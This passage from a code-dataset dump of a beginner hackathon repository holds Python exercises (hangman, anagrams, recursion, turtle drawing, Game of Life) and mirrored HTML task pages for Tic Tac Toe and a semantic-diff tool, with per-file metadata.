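        rows = "ABCDEF"
        return np.array([[r + str(c) for c in range(1, 7)] for r in rows])

    game_array = make_label_grid()
    raw_spot = np.where(game_array == "C4")     # tuple of (row indices, col indices)
    spot = list(zip(raw_spot[0], raw_spot[1]))  # [(2, 3)] -- row 'C', column 4
    print(spot)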
jnajman/hackaton | https://github.com/jnajman/hackaton | 2932a1fce888caf00d91e3a7cbe482d7fd556f23 | 9f568323b0d67ce50913fb5f2f81ce1aee5004ad | 190546b5ef8ad70bc53479dd626966711873b30f | refs/heads/master | 2020-07-04T02:13:59.289284 | 2016-11-20T17:35:55 | 2016-11-20T17:35:55 | 74,197,157 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6136523485183716,
"alphanum_fraction": 0.6228008270263672,
"avg_line_length": 22.700000762939453,
"blob_id": "6d1cb210de8c0d36b63fef99e8d9d9c33f691a7e",
"content_id": "f612a04e071bfb63906e6c6deab9f83fa13dd5e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1421,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 60,
"path": "/05_hangman/05_hangman_01.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\n# define a function for generating a random word\ndef choose_word():\n return('abc')\n\ndef disp_word(word,guessed_letters):\n hidden_word=list(word)\n print(' '.join(hidden_word))\n for i in range(len(hidden_word)):\n if guessed_letters[hidden_word[i]]==0:\n hidden_word[i]='_'\n print(' '.join(hidden_word))\n\ndef word_complete(word,guessed_letters):\n cntr=0\n for i in range(len(word)):\n if guessed_letters[word[i]] == 0:\n cntr+=1\n return cntr\n\n\nword = choose_word()\n\n# main loop\nnum_of_trials=3\ntrial_no=1\nguessed_letters_dict=dict.fromkeys('abcdefghijklmnopqrstuvwxyz', 0)\ngame_end=0\n\nwhile (trial_no<num_of_trials) and (game_end==0):\n # print out current state of the game\n # for example - We're guessing the word: _ _ _ _ _ _ _ _ _ _\n print('-Kolo '+str(trial_no)+' z '+str(num_of_trials)+'-')\n\n # for example - We're guessing the word: _ _ _ _ _ _ _ _ _ _\n disp_word(word,guessed_letters_dict)\n\n\n # let's get a letter from the user\n letter = input(\"Guess the letter: \")\n\n # make sure the letter is only one character\n # TODO\n\n # print the letter to see if everything is ok by now\n print(\"You guessed\", letter)\n\n\n # determine if the letter is in the word\n if letter in word:\n guessed_letters_dict[letter]=1\n\n if word_complete(word,guessed_letters_dict)>0:\n game_end=1\n\n\n\n\nprint('konec')"
},
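The word_complete helper above returns how many letters are still hidden, so the game is won once it reports zero. A set-based check expresses the same test more directly; a sketch (boolean convention, not the repo's counting one):

    def word_is_complete(word, guessed_letters):
        # True once every distinct letter of the word has been guessed
        return all(guessed_letters[ch] == 1 for ch in set(word))

    guessed = dict.fromkeys('abcdefghijklmnopqrstuvwxyz', 0)
    for ch in 'abc':
        guessed[ch] = 1
    print(word_is_complete('abc', guessed))  # True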
{
"alpha_fraction": 0.511878490447998,
"alphanum_fraction": 0.536414384841919,
"avg_line_length": 65.4051742553711,
"blob_id": "981d70bca80b336ecac40925c3507c2c36ccb703",
"content_id": "fcadfc82ec1da7dc3bb2eaaba975ab514dff197c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7705,
"license_type": "no_license",
"max_line_length": 533,
"num_lines": 116,
"path": "/hackaton_web/hack.engeto.com/tasks/semanticdiff.html",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "<html lang=\"en\">\n \n<!-- Mirrored from hack.engeto.com/tasks/semanticdiff by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 20 Nov 2016 09:37:26 GMT -->\n<!-- Added by HTTrack --><meta http-equiv=\"content-type\" content=\"text/html;charset=UTF-8\" /><!-- /Added by HTTrack -->\n<head>\n <meta charset=\"utf-8\">\n <title>Task: Semantic diff</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n <link href=\"../css/bootstrap.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/themify-icons.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/flexslider.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/lightbox.min.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/ytplayer.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/theme.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/custom.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href='http://fonts.googleapis.com/css?family=Lato:300,400%7CRaleway:100,400,300,500,600,700%7COpen+Sans:400,500,600' rel='stylesheet' type='text/css'>\n </head>\n <body>\n <div class=\"main-container\">\n <section class=\"page-title page-title-4\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-md-6\">\n <h3 class=\"uppercase mb0\">Task: Semantic diff</h3>\n </div>\n </div>\n <!--end of row-->\n </div>\n <!--end of container-->\n </section>\n <section class=\"pt0 pb40\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Level:</span>\n <h6 class=\"uppercase mb0\">Advanced</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Time allocation:</span>\n <h6 class=\"uppercase mb0\">2 days</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Lines of code:</span>\n <h6 class=\"uppercase mb0\">1000+</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Category:</span>\n <h6 class=\"uppercase mb0\">Tool</h6>\n </div>\n </div>\n <!--end of row-->\n </div>\n <!--end of container-->\n </section>\n <section>\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Description</h4>\n <p>\nEveryone knows the <b>diff</b> tool, right? The old-school utility taking two files on input and producing how the two files differ from each other. Together with another old-school utility, <b>patch</b>, it pretty much enabled distributed, collaborative software development.<br/> \n\nBut comparing source code as text should not be the end of it. Python code has rules and structure. It has entities like modules, classes and methods. It is possible to compare two versions of a Python project as programs, not as text, taking into account the semantics of the code. Which modules, classes or methods were changed, which were added, removed or moved around. What changed in the entities: were interfaces or contracts changed, or just implementation? 
Was is core of the program, or some weird, rarely used plugin?<br/>\n\nThe goal of this project is to produce a tool that understand Python code and is able to semantically compare two Python program versions (like a baseline and a pull request).\n </p>\n </div>\n </div>\n <!--end of row-->\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">How to start</h4>\n <p>\nPrograms are trees (ASTs) and there are good tools that can read Python into ASTs for you already (<a href=\"https://pypi.python.org/pypi/astroid\">astroid</a>). Simple semantic diff is probably a tree graph difference problem, for which there might be some nice solutions already in some graph library. Then it’s mostly a matter of determining what changes to look for, what to do with them and how to present them. Plus dealing with pseudo-differences like moving code around, renaming etc.\n </p>\n </div>\n </div>\n <!--end of row-->\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Further ideas</h4>\n <h5>Program that describes a change in a natural language, just as a programmer would</h5>\n <h5>Program that extracts semantic properties of changes, for example to create a data set describing evolution of a software project that could be analysed for insights.</h5>\n <h5>A GitHub-integrated service producing useful information for PR reviewers</h5>\n <h5>Integration with pylint that would allow pylint to focus only on the code that was changed.</h5>\n </div>\n </div>\n <!--end of row-->\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Random resources and inspiration</h4>\n <h5 class=\"uppercase\"><a href=\"https://www.semanticmerge.com/\">Semantic merge</a></h5>\n <h5 class=\"uppercase\"><a href=\"http://stackoverflow.com/questions/523307/semantic-diff-utilities\">StackOverflow discussion</a></h5>\n <h5 class=\"uppercase\"><a href=\"https://github.com/yinwang0/psydiff\">psydiff</a></h5>\n <h5 class=\"uppercase\"><a href=\"https://yinwang0.wordpress.com/2012/01/03/ydiff/\">ydiff</a></h5>\n </div>\n </div>\n <!--end of row-->\n </section>\n </div>\n <script src=\"../js/jquery.min.js\"></script>\n <script src=\"../js/bootstrap.min.js\"></script>\n <script src=\"../js/flickr.html\"></script>\n <script src=\"../js/flexslider.min.js\"></script>\n <script src=\"../js/lightbox.min.js\"></script>\n <script src=\"../js/masonry.min.js\"></script>\n <script src=\"../js/twitterfetcher.min.js\"></script>\n <script src=\"../js/spectragram.min.js\"></script>\n <script src=\"../js/ytplayer.min.js\"></script>\n <script src=\"../js/countdown.min.js\"></script>\n <script src=\"../js/smooth-scroll.min.js\"></script>\n <script src=\"../js/parallax.js\"></script>\n <script src=\"../js/scripts.js\"></script>\n </body>\n\n<!-- Mirrored from hack.engeto.com/tasks/semanticdiff by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 20 Nov 2016 09:37:26 GMT -->\n</html>\n"
},
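The task page recommends astroid; the standard-library ast module is enough to sketch the core idea. A toy version that diffs only top-level function names between two source strings (everything here is illustrative, not from the task page):

    import ast

    def top_level_functions(source):
        # Names of functions defined at module level
        tree = ast.parse(source)
        return {node.name for node in tree.body if isinstance(node, ast.FunctionDef)}

    old = "def f(x):\n    return x\n\ndef g():\n    pass\n"
    new = "def f(x):\n    return x + 1\n\ndef h():\n    pass\n"

    print("added:", top_level_functions(new) - top_level_functions(old))    # {'h'}
    print("removed:", top_level_functions(old) - top_level_functions(new))  # {'g'}

A real tool would recurse into classes and compare bodies as trees rather than just names, which is where the tree-difference problem mentioned above comes in.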
{
"alpha_fraction": 0.5938123464584351,
"alphanum_fraction": 0.6077844500541687,
"avg_line_length": 24.075000762939453,
"blob_id": "267445628dfd15c8d2bdac3bd290014b9e3ef90e",
"content_id": "f2e8186892b1c7369336a085029deb208c882c99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1002,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 40,
"path": "/04_anagrams/04_anagrams_01.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "try:\n f=open(\"words.txt\",'r')\n dictionary = f.read().splitlines()\n # print(f.readlines())\n # print(dictionary)\n\n myword='tea'\n\n # print(len(dictionary[20]))\n # print(dictionary[12359])\n # alph_dict = dict.fromkeys('abcdefghijklmnopqrstuvwxyz', 0)\n # print(alph_dict)\n\n\n # print(dictionary[0][3])\n\n myword_len=len(myword)\n # print(myword_len)\n\n myword_alph_dict=dict.fromkeys('abcdefghijklmnopqrstuvwxyz', 0)\n # print(myword_alph_dict.keys())\n\n for i in range(myword_len):\n myword_alph_dict[myword[i]] += 1\n\n # print(myword_alph_dict)\n\n\n dictionary_len=len(dictionary)\n\n for j in range(dictionary_len):\n if myword_len==len(dictionary[j]):\n newword_alph_dict = dict.fromkeys('abcdefghijklmnopqrstuvwxyz', 0)\n for k in range(len(dictionary[j])):\n newword_alph_dict[dictionary[j][k]] += 1\n if myword_alph_dict==newword_alph_dict:\n print(dictionary[j])\n\nfinally:\n f.close()"
},
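04_anagrams_01.py above decides anagram-hood by building two a-z frequency dicts and comparing them. collections.Counter implements exactly that multiset comparison; a sketch of the same test:

    from collections import Counter

    def is_anagram(a, b):
        # Anagrams iff the letter multisets match
        return Counter(a) == Counter(b)

    print(is_anagram("tea", "eat"))  # True
    print(is_anagram("tea", "tee"))  # False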
{
"alpha_fraction": 0.6251851916313171,
"alphanum_fraction": 0.6622222065925598,
"avg_line_length": 18.014083862304688,
"blob_id": "00d1bbd2552698704a794b6881a07bd33f750db8",
"content_id": "5a5604534a7242f519e9b33ed98ed9fccd2c68db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1350,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 71,
"path": "/03_recursion/03_draw_01_nautilus.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "'''\nIn this exercise, you'll understand the concepts of recursion using selected programs - Fibonacci sequence, Factorial and others. We will also use Turtle graphics to simulate recursion in graphics.\n\nFactorial\nFibonacci\nGreatest common divisor\n\nOnce we understand the principles of recursion, we can do fun stuff with Turtle graphics and DRAW:\n\na square\na nautilus\na spiral\na circles (many circles)\na hexagram\na Koch star\na snowflake\na tree\n'''\n# ------------------\n#turtle\n# ------------------\n\nimport turtle\nfrom math import cos,sin\nfrom math import radians as deg2rad\nfrom math import degrees as rad2deg\n\ndef F(n):\n if n == 0: return 0\n elif n == 1: return 1\n else: return F(n-1)+F(n-2)\n\nm=13\n# turtle.shape('turtle')\nturtle.forward(F(m))\nturtle.left(90)\n\nfor j in range(m,0,-1):\n a=F(j)\n zlomy=5\n angle1=90/(zlomy+1)\n d=2*a*sin(deg2rad(angle1/2))\n turn_angle=(angle1/2)\n\n\n for i in range(0,zlomy+1):\n turtle.left(turn_angle)\n turtle.forward(d)\n turtle.left(angle1/2)\n\nturtle.exitonclick()\n\n\n\n# a=200\n# zlomy=20\n# angle1=90/(zlomy+1)\n# d=2*a*sin(deg2rad(angle1/2))\n# turn_angle=(angle1/2)\n#\n#\n# turtle.forward(a)\n# turtle.left(90)\n#\n# for i in range(0,zlomy+1):\n# turtle.left(turn_angle)\n# turtle.forward(d)\n# turtle.left(angle1/2)\n#\n# # turtle.shape('turtle')\n# turtle.exitonclick()\n"
},
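The nautilus script above approximates each quarter-circle of radius a = F(j) with zlomy+1 straight chords; d = 2*a*sin(angle/2) is the standard chord length for an arc subtending that angle. A worked check of those lines, reusing the same variable names:

    from math import sin
    from math import radians as deg2rad

    a = 200                                # quarter-circle radius
    zlomy = 5                              # interior break points
    angle1 = 90 / (zlomy + 1)              # degrees of arc per chord
    d = 2 * a * sin(deg2rad(angle1 / 2))   # chord length for that arc
    print(angle1, round(d, 2))             # 15.0 -> chord ~52.21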
{
"alpha_fraction": 0.6283857226371765,
"alphanum_fraction": 0.6522210240364075,
"avg_line_length": 21.536584854125977,
"blob_id": "6554c99947fa4199f06d77f91367e39662c684ed",
"content_id": "cfdbb67a7bd180a2b294ca177f7a7db6836405e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 923,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 41,
"path": "/03_recursion/03_recursion_02_fibonacci.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "'''\nIn this exercise, you'll understand the concepts of recursion using selected programs - Fibonacci sequence, Factorial and others. We will also use Turtle graphics to simulate recursion in graphics.\n\nFactorial\nFibonacci\nGreatest common divisor\n\nOnce we understand the principles of recursion, we can do fun stuff with Turtle graphics and DRAW:\n\na square\na nautilus\na spiral\na circles (many circles)\na hexagram\na Koch star\na snowflake\na tree\n'''\n# ------------------\n#fibonacci\n# ------------------\n\n# def fibo3(num_1,num_2,counter,length):\n# if counter==length:\n# print(num_2)\n# return num_2\n# else:\n# counter+=1\n# return fibo3(num_2,num_1+num_2,counter,length)\n#\n# fibo_in=input('zadej delku fibonacciho rady (vetsi nez 2): ')\n# # print(fact_in)\n# fibo3(1,1,2,int(fibo_in))\n\n\ndef F(n):\n if n == 0: return 0\n elif n == 1: return 1\n else: return F(n-1)+F(n-2)\n\nprint(F(8))"
},
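The plain recursive F(n) above recomputes the same subproblems exponentially many times; memoization brings it down to linear. A sketch using functools.lru_cache (the same decorator this repo imports in Num_con_cache.py further below):

    from functools import lru_cache

    @lru_cache(maxsize=None)
    def F(n):
        # Same definition as above, but each F(k) is evaluated only once
        if n == 0: return 0
        elif n == 1: return 1
        else: return F(n-1) + F(n-2)

    print(F(8))   # 21
    print(F(90))  # instant, where the naive version would not finish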
{
"alpha_fraction": 0.45952415466308594,
"alphanum_fraction": 0.48134592175483704,
"avg_line_length": 55.373016357421875,
"blob_id": "b5a84cf6c02a358bdbe6c030ab069a00063203e1",
"content_id": "8754317a34ff4dcc19ae4361515451542f8f5139",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7103,
"license_type": "no_license",
"max_line_length": 353,
"num_lines": 126,
"path": "/hackaton_web/hack.engeto.com/tasks/tictactoe.html",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "<html lang=\"en\">\n \n<!-- Mirrored from hack.engeto.com/tasks/tictactoe by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 20 Nov 2016 09:37:14 GMT -->\n<!-- Added by HTTrack --><meta http-equiv=\"content-type\" content=\"text/html;charset=UTF-8\" /><!-- /Added by HTTrack -->\n<head>\n <meta charset=\"utf-8\">\n <title>Task: Tic Tac Toe</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n <link href=\"../css/bootstrap.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/themify-icons.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/flexslider.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/lightbox.min.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/ytplayer.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/theme.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/custom.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href='http://fonts.googleapis.com/css?family=Lato:300,400%7CRaleway:100,400,300,500,600,700%7COpen+Sans:400,500,600' rel='stylesheet' type='text/css'>\n </head>\n <body>\n <div class=\"main-container\">\n <section class=\"page-title page-title-4\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-md-6\">\n <h3 class=\"uppercase mb0\">Task: Tic Tac Toe</h3>\n </div>\n </div>\n <!--end of row-->\n </div>\n <!--end of container-->\n </section>\n <section class=\"pt0 pb40\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Level:</span>\n <h6 class=\"uppercase mb0\">All Beginners</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Time allocation:</span>\n <h6 class=\"uppercase mb0\">2 - 5 hours</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Lines of code:</span>\n <h6 class=\"uppercase mb0\">50 - 200</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Category:</span>\n <h6 class=\"uppercase mb0\">game</h6>\n </div>\n </div>\n <!--end of row-->\n </div>\n <!--end of container-->\n </section>\n <section>\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Description</h4>\n <p>\n Besides being a German female pop group, Tic Tac Toe is a game for 2 players. Each player can place one mark (or stone) per turn on the 3x3 grid The player who succeeds in placing three of their marks in a horizontal, vertical, or diagonal row wins the game. The marks used are usually 'x' and 'o' for respective players.</p>\n <p>The final aim in this task is that one of the players will be the computer. You will implement an algorithm, that will help the computer to beat the human.</p>\n \n <p>First things first, let's start from the base. These are the basic things your program should be able to do:</p>\n <ul>\n <li>shortly describe game rules</li>\n <li>display the game board</li>\n <li>ask the player #1 to choose the position to take</li>\n <li>display the game board with the newly taken position</li>\n <li>ask the player #2 to choose the position to take</li>\n <li>display the game board with the newly taken position etc.</li>\n </ul>\n The program should be able to assess and inform the user, whether either of the players won the game or the players drew. 
(Don't forget to terminate the program) \n\n </p>\n\n <p>Once your game can perform the stuff above, try to do the bonus tasks</p>\n \n </div>\n </div>\n <!--end of row-->\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Sample usage</h4>\n <p>\n\n </p>\n <p>Converting from decimal to binary:</p>\n <pre>[test@test ]$ ./ttt.py\nWelcome to Tic Tac Toe, the game where ...\n#somewhere here display the game board\nWhat position will you take?\n...\n</pre>\n </div>\n </div>\n <!--end of row-->\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Bonus</h4>\n <p>Include the computer as the second player (who will start the game? Will it be always the same player?)</p>\n <p>Implement minimax algorithm to help the computer to beat the human</p>\n <p>Try to create GUI with Pygame library</p>\n <p>Your game board can be bigger than 3x3. Does your algorithm still work?</p>\n \n </div>\n </div>\n <!--end of row-->\n </section>\n </div>\n <script src=\"../js/jquery.min.js\"></script>\n <script src=\"../js/bootstrap.min.js\"></script>\n <script src=\"../js/flickr.html\"></script>\n <script src=\"../js/flexslider.min.js\"></script>\n <script src=\"../js/lightbox.min.js\"></script>\n <script src=\"../js/masonry.min.js\"></script>\n <script src=\"../js/twitterfetcher.min.js\"></script>\n <script src=\"../js/spectragram.min.js\"></script>\n <script src=\"../js/ytplayer.min.js\"></script>\n <script src=\"../js/countdown.min.js\"></script>\n <script src=\"../js/smooth-scroll.min.js\"></script>\n <script src=\"../js/parallax.js\"></script>\n <script src=\"../js/scripts.js\"></script>\n </body>\n\n<!-- Mirrored from hack.engeto.com/tasks/tictactoe by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 20 Nov 2016 09:37:14 GMT -->\n</html>\n"
},
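For the minimax bonus named above, a compact sketch for a 3x3 board stored as a 9-element list of 'x', 'o' or ' ', scored from 'x''s point of view. This illustrates the algorithm the task names; it is not code from the task page:

    LINES = [(0,1,2),(3,4,5),(6,7,8),(0,3,6),(1,4,7),(2,5,8),(0,4,8),(2,4,6)]

    def winner(board):
        for i, j, k in LINES:
            if board[i] != ' ' and board[i] == board[j] == board[k]:
                return board[i]
        return None

    def minimax(board, player):
        # Returns (score, move): +1 if 'x' can force a win, -1 if 'o' can, 0 draw
        w = winner(board)
        if w: return (1 if w == 'x' else -1), None
        moves = [i for i, c in enumerate(board) if c == ' ']
        if not moves: return 0, None
        best = None
        for m in moves:
            board[m] = player
            score, _ = minimax(board, 'o' if player == 'x' else 'x')
            board[m] = ' '
            if best is None or (player == 'x' and score > best[0]) \
                            or (player == 'o' and score < best[0]):
                best = (score, m)
        return best

    board = list("x oxo    ")
    print(minimax(board, 'x'))  # (1, 6): 'x' completes the 0-3-6 column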
{
"alpha_fraction": 0.5733544826507568,
"alphanum_fraction": 0.6367961764335632,
"avg_line_length": 28.34883689880371,
"blob_id": "2414528cf808c87162d026c542f6cea9b6bc9d74",
"content_id": "60761c5b472925bf8de58037a787825b8275c3fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1261,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 43,
"path": "/06_gameoflife/06_gameoflife_disp1.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "import pygame, sys, numpy, time\npygame.init() # initialize the pygame system\nsize = (500, 500) # window size is a 2-tuple measured in px\nscreen = pygame.display.set_mode(size)\nmargin=10\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\n# Initialize the clock\nclock = pygame.time.Clock()\nmax_fps = 60 # maximum number of cycles (frames) per second\n\n# init test data\n# grid=numpy.zeros((width,height),int)\n# grid[0][2]=1 #glider\n# grid[1][3]=1\n# grid[2][1]=1\n# grid[2][2]=1\n# grid[2][3]=1\n\nwhile True:\n clock.tick(max_fps) # limit the refresh rate to a max of 60 cycles per second\n\n # Quit when the user closes the window\n for event in pygame.event.get():\n if event.type == pygame.QUIT: sys.exit()\n # elif event.type == pygame.MOUSEBUTTONDOWN:\n # # Get mouse position whenever it moves\n # mouse_position = event.pos # event.pos is a mouse position 2-tuple\n # print(mouse_position)\n\n\n screen.fill((255, 255, 255)) # RGB white color tuple\n\n # pygame.draw.rect(screen, RED, [50, 50, 20, 20], 1)\n for m in range(10):\n pygame.draw.line(screen, GREEN, [10*m,0], [10*m,100], 1)\n\n pygame.display.flip() # Display what was drawn this turn"
},
{
"alpha_fraction": 0.6995994448661804,
"alphanum_fraction": 0.7036048173904419,
"avg_line_length": 22.4375,
"blob_id": "e7b6f075a8c8e7848978a927d8425f6d9e3bcb1c",
"content_id": "8520dca12fb4398c9d5ea501e8d99fa2c527ec1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 749,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 32,
"path": "/03_recursion/03_recursion_01_factorial.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "'''\nIn this exercise, you'll understand the concepts of recursion using selected programs - Fibonacci sequence, Factorial and others. We will also use Turtle graphics to simulate recursion in graphics.\n\nFactorial\nFibonacci\nGreatest common divisor\n\nOnce we understand the principles of recursion, we can do fun stuff with Turtle graphics and DRAW:\n\na square\na nautilus\na spiral\na circles (many circles)\na hexagram\na Koch star\na snowflake\na tree\n'''\n# ------------------\n#factorial\n# ------------------\n\ndef factorial(num_in):\n if num_in<1:\n return 1\n else:\n return_number=num_in*factorial(num_in-1)\n return return_number\n\nfact_in=input('zadej cislo pro vypocet faktorialu: ')\n# print(fact_in)\nprint(factorial(int(fact_in)))"
},
{
"alpha_fraction": 0.4261838495731354,
"alphanum_fraction": 0.4558960199356079,
"avg_line_length": 26.86206817626953,
"blob_id": "56973246dff44692ec31937f80fb92afe920202a",
"content_id": "5c0abe4ea697e741fc78ebbd6c5c505e82da24cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3231,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 116,
"path": "/06_gameoflife/06_gameoflife_disp2_matlab.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "import numpy\nimport matplotlib.pyplot as plt\n\n# init test data\n# grid=numpy.zeros((10,10),int)\n# grid[0][2]=1 #glider\n# grid[1][3]=1\n# grid[2][1]=1\n# grid[2][2]=1\n# grid[2][3]=1\n\nf = plt.figure()\nax = f.gca()\nf.show()\n\n# for i in range(30):\n# grid[0][0] += 1\n# plt.imshow(grid,interpolation='none')\n# f.canvas.draw()\n\n\n\n #-------------------------------------------------------------------------\nwidth=50\nheight=50\n# grid = [[0 for x in range(width)] for y in range(height)]\ngrid=numpy.zeros((width,height),int)\n\n# #glider:\ngrid[0][2]=1\ngrid[1][3]=1\ngrid[2][1]=1\ngrid[2][2]=1\ngrid[2][3]=1\n\n#oscilator:\n# grid[2][1]=1\n# grid[2][2]=1\n# grid[2][3]=1\n\nfor step in range(1000):#kroky simulace\n\n # for i in range(len(grid)): #vypise matici\n # print(grid[i])\n plt.cla()\n plt.imshow(grid, cmap=plt.get_cmap('viridis'), interpolation='none') #vykresli matici\n f.canvas.draw()\n\n # input('pauza') #---PAUZA---\n\n grid_new = numpy.zeros((width, height), int) # nova matice (na zacatku vynulovana)\n\n for m in range(width):#po radcich\n for n in range(height):#po sloupcich\n num_of_neighbours=0 #vynulovat pred kazdou novou bunkou\n #\n #operace pro danou bunku:\n #\n\n try:#podivej nahoru\n if grid[m-1][n]==1:\n num_of_neighbours+=1\n except IndexError:\n pass\n\n try: # podivej vpravo nahoru\n if grid[m - 1][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vpravo\n if grid[m][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vpravo dolu\n if grid[m+1][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej dolu\n if grid[m + 1][n] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo dolu\n if grid[m + 1][n - 1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo\n if grid[m][n-1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo nahoru\n if grid[m - 1][n - 1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n if grid[m][n]==0: #pokud je aktualni bunka mrtva...\n if num_of_neighbours==3: #...ale ma 3 sousedy...\n grid_new[m][n]=1 #... --> ozivit (jinak je defaultne mrtva)\n\n if grid[m][n]==1: #pokud je aktualni bunka ziva...\n if num_of_neighbours==2 or num_of_neighbours==3: #...a ma 2 nebo 3 sousedy...\n grid_new[m][n] = 1 #...nech ji zit (jinak je defaultne mrtva)\n\n grid=numpy.copy(grid_new) #update zakladni grid"
},
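One caveat with the try/except IndexError guards used above (and in testy.py below): Python only raises IndexError past the end of a sequence, so grid[m-1] with m == 0 silently reads grid[-1], the last row. The top and left edges therefore wrap around toroidally while the bottom and right do not. A bounds-checked neighbour count avoids the asymmetry; a sketch with a hypothetical helper name:

    import numpy as np

    def count_neighbours(grid, m, n):
        # Explicit bounds checks: no wrap-around on any edge
        rows, cols = grid.shape
        total = 0
        for dm in (-1, 0, 1):
            for dn in (-1, 0, 1):
                if dm == 0 and dn == 0:
                    continue
                r, c = m + dm, n + dn
                if 0 <= r < rows and 0 <= c < cols:
                    total += grid[r][c]
        return total

    grid = np.zeros((5, 5), int)
    grid[0][1] = grid[1][0] = 1
    print(count_neighbours(grid, 0, 0))  # 2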
{
"alpha_fraction": 0.44137707352638245,
"alphanum_fraction": 0.4667099714279175,
"avg_line_length": 26.01754379272461,
"blob_id": "6f04f70f8182b4355f22d1c0bdeabb9621b1ac9a",
